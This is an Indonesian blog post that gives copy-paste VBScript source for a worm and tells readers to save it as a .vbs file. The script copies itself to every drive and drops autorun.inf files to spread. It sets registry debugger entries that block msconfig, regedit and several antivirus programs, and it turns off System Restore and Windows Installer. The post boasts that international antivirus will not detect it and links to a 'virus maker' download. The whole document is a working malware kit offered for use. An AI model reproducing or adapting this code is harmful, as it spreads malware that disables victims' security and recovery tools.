Sekarang silahkan copy paste code dibawah ini:
On error resume next
Dim dini,Arip,i,loph,you,mf,isi,tf,Dhanelovearip,nt,check,sd
lol=msgbox ("WARNING !!! ARIP menginfeksi keseluruh Computer Segeralah Sholat ")
Isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe Dhanelovearip.vbs"
Set you = createobject("scripting.filesystemobject")
Set mf = you.getfile(wscript.scriptfullname)
Dim text,size
Size = mf.size
Check = mf.drive.drivetype
Set text = mf.openastextstream(1,-2)
Do while not text.atendofstream
Dini = dini & text.readline
Dini = dini & vbcrlf
Loop
Do
Set i = you.getspecialfolder(0)
Set arip = you.getspecialfolder(1)
Set tf = you.getfile(arip & "\Dhanelovearip.vbs")
Tf.attributes = 32
Set tf = you.createtextfile(arip & "\Dhanelovearip",2,true)
Tf.write dini
Tf.close
Set tf = you.getfile(arip & "\Dhanelovearip.vbs")
Tf.attributes = 39
For each loph in you.drives
If (loph.drivetype = 1 or loph.drivetype = 2) and loph.path <> "a:" then
Set tf=you.getfile(loph.path &"\Dhanelovearip.sys.vbs")
Tf.attributes =32
Set tf=you.createtextfile(loph.path &"\Dhanelovearip.vbs",2,true)
Tf.write dini
Tf.close
Set tf=you.getfile(loph.path &"\Dhanelovearip.vbs")
Tf.attributes = 39
Set tf =you.getfile(loph.path &"\autorun.inf")
Tf.attributes = 32
Set tf=you.createtextfile(loph.path &"\autorun.inf",2,true)
Tf.write isi
Tf.close
Set tf = you.getfile(loph.path &"\autorun.inf")
Tf.attributes=39
End if
Next
Set Dhanelovearip = createobject("wscript.shell")
Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\msconfig.exe\debugger",""
Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedit.exe\debugger",""
Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedt32.exe\debugger",""
Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\registryeditor.exe\debugger",""
Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\setup.exe\debugger",""
Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avscan.exe\debugger",""
Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\SM?RTP.exe\debugger",""
Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avcenter.exe\debugger",""
Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ashavast.exe\debugger",""
Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ansav.exe\debugger",""
Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremoval.exe\debugger",""
Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremover.exe\debugger",""
Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\pcmav-cln.exe.exe\debugger",""
Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\winlogon\legalnoticecaption", "my loph dini"
Dhanelovearip.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\limitsystemrestorecheckpointing", "1", "reg_dword"
Dhanelovearip.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\disablemsi", "1", "reg_dword"
Dhanelovearip.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disablesr", "1", "reg_dword"
Dhanelovearip.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disableconfig", "1", "reg_dword"
If check <> 1 then
Wscript.sleep 200000
End if
Loop while check <> 1
Set sd = createobject("wscript.shell")
Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname
Ni virus sangat ampuh banget, tapi saying udah kedetect ama AV local kayak smadav, tapi kalau AV inter gak bakal detect,,,,,,,, simpan dengan extensi .vbs GOOD LUCK……….???
atau download software dsni ; http://www.4shared.com/file/sSAzzrdm/SyaRiEfVirus_Maker_v31.html
atau download software dsni ; http://www.4shared.com/file/sSAzzrdm/SyaRiEfVirus_Maker_v31.html
Tidak ada komentar:
Posting Komentar